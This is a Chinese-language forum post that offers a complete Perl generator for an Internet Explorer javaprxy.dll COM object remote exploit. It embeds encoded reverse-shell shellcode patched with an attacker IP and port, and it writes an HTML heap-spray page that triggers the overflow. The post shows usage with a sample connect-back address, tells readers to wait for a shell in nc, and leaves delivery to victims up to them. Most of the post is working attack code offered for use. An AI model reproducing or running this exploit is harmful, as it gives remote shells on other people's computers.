Microsoft Internet Explorer javaprxy.dll COM Object 溢出漏洞是前两天刚刚公布的,类似这样的漏洞我在以前也发过一个。这个漏洞的原理我不多说,总之又是IE的一个洞洞。漏洞利用方式依然采用暴力扩大内存的方式,我这里修改主要针对shellcode做了修改。
本地监听的shellcode没什么利用价值,还是反向的来得舒服。但是这个shellcode修改不是那么容易的是,为了防止shellcode被unicode编码所以要采用点小措施来方法。
整个程序我已经写出来了,如下,完全perl代码:
#! /usr/bin/perl
#doomie.pl
use strict;
use Socket;
my $reverse_shell="\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA".
"\xEB\x05\xE8\xEB\xFF\xFF\xFF".
"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12".
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99".
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12".
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99".
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9".
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D".
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA".
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32".
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10".
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8".
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66".
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5".
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8".
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A".
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12".
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A".
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C".
"\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33".
"\xF9\x7E\xE0\x5F\xE0";
my $shellcode_text;
print "\tMicrosoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n\n";
print "\t\t connect back shell rewritten by 无敌最寂寞[EST]\n\n";
print "Usage:\n\tdoomie.pl <connect-back-ip> <connect-back-port> [destination file]\n\n";
print "Attention:if [destination file] is omitted,superlone.html will be default!\n\n";
my $ip=shift || die "[-]ERROR! connect back ip must be specified!\n";
my $port=shift || die "[-]ERROR!connect back port must be specified!\n";
my $file=shift || "superlone.html";
print "[+]Generating Shellcode ......";
$ip=inet_aton($ip);
$ip=$ip^(pack "L",0x99999999);
$port=(pack "n",$port)^(pack "S",0x9999);
substr($reverse_shell,118,2)=$port;
substr($reverse_shell,111,4)=$ip;
#open(FILE,">temp");
#binmode(FILE);
#print FILE $reverse_shell;
#close(FILE);
my $len=length($reverse_shell);
my @temp;
my $i=0;
while($i<$len){
$temp[$i]=sprintf("%.2x",ord(substr($reverse_shell,$i,1)));
$i++;
}
$i=0;
while($i<$len)
{
if($i % 2!=0)
{
$shellcode_text.="%u".$temp[$i].$temp[$i-1];
}
$i++;
}
print "DONE\n";
print "[+]Creating exploitable file ......";
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";
my $jedi="shellcode = unescape(\"%u4343\"+\"%u4343\"+\"$shellcode_text\");\n";
# Memory
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length;\n".
"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<750;i++) memory[i] = block + shellcode;\n".
"</SCRIPT>\n";
# javaprxy.dll
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0';
# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n".
"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n".
"by the FrSIRT < [url]http://www.frsirt.com[/url] >\n".
"reverse shellcode by 无敌最寂寞[EST]\n".
"Solution - [url]http://www.frsirt.com/english/advisories/2005/0935[/url]".
"</body><script>location.reload();</script></html>";
open(FILE,">$file") || die "[+]ERROR!open file failed!\n";
print FILE "$header $jedi $code $footer";
close FILE;
print "DONE\n\n";
print "CHECK if it does WORK!\n";
程序的帮助信息如下:
H:\temp>doomie.pl
Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit
connect back shell rewritten by 无敌最寂寞[EST]
Usage:
doomie.pl <connect-back-ip> <connect-back-port> [destination file]
Attention:if [destination file] is omitted,superlone.html will be default!
[-]ERROR! connect back ip must be specified!
参数前两个我就不用多说了吧,最后一个是要生成的文件的文件名,比如dest.html,如果省略默认的文件名是superlone.html。
好,我们来实际生成一个看看:
H:\temp>doomie.pl 222.133.151.197 1314
Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit
connect back shell rewritten by 无敌最寂寞[EST]
Usage:
doomie.pl <connect-back-ip> <connect-back-port> [destination file]
Attention:if [destination file] is omitted,superlone.html will be default!
[+]Generating Shellcode ......DONE
[+]Creating exploitable file ......DONE
CHECK if it does WORK!
这样在程序的同目录下生成了一个默认文件名superlone.html的文件。
用ie打开它就会引发溢出,如果你 lucky enough,那就去你的nc检查一下看看是不是得到shell了吧。。
至于怎么让目标机器运行,那是你的事啦,与我无关的说!
以下是我在远程机器上测试后的截图,在此我要感谢论坛的xyzreg兄帮忙测试:
刚才在测试当中又发现了几个错误,现已一一修改了~~~请重新复制上面的代码或者直接下载下面的压缩包!
再次感谢xyzreg兄帮忙测试!